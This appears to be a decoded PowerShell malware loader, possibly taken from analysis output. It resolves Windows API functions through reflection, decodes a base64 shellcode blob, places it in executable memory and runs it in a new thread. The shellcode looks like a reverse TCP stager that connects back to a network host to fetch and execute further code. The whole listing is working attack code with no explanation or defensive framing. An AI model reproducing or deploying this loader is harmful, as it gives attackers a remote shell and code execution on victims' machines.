Decoded

1. function aT4XU {
2. Param ($cFnyX, $sJ)
3. $n3H = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4.  
5. return $n3H.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($n3H.GetMethod('GetModuleHandle')).Invoke($null, @($cFnyX)))), $sJ))
6. }
7.  
8. function xGl {
9. Param (
10. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $ha2J6,
11. [Parameter(Position = 1)] [Type] $ttldt = [Void]
12. )
13.  
14. $kxfXs = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15. $kxfXs.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ha2J6).SetImplementationFlags('Runtime, Managed')
16. $kxfXs.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ttldt, $ha2J6).SetImplementationFlags('Runtime, Managed')
17.  
18. return $kxfXs.CreateType()
19. }
20.  
21. [Byte[]]$hczL = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEaaAIAEVyJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAz/Tgh17GjwtaJW/9VqAGoEVldoAtnIX//VizZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//VAcMpxnXuww==")
22.  
23. $wqnp = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((aT4XU kernel32.dll VirtualAlloc), (xGl @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $hczL.Length,0x3000, 0x40)
24. [System.Runtime.InteropServices.Marshal]::Copy($hczL, 0, $wqnp, $hczL.length)
25.  
26. $xu = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((aT4XU kernel32.dll CreateThread), (xGl @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$wqnp,[IntPtr]::Zero,0,[IntPtr]::Zero)
27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((aT4XU kernel32.dll WaitForSingleObject), (xGl @([IntPtr], [Int32]))).Invoke($xu,0xffffffff) | Out-Null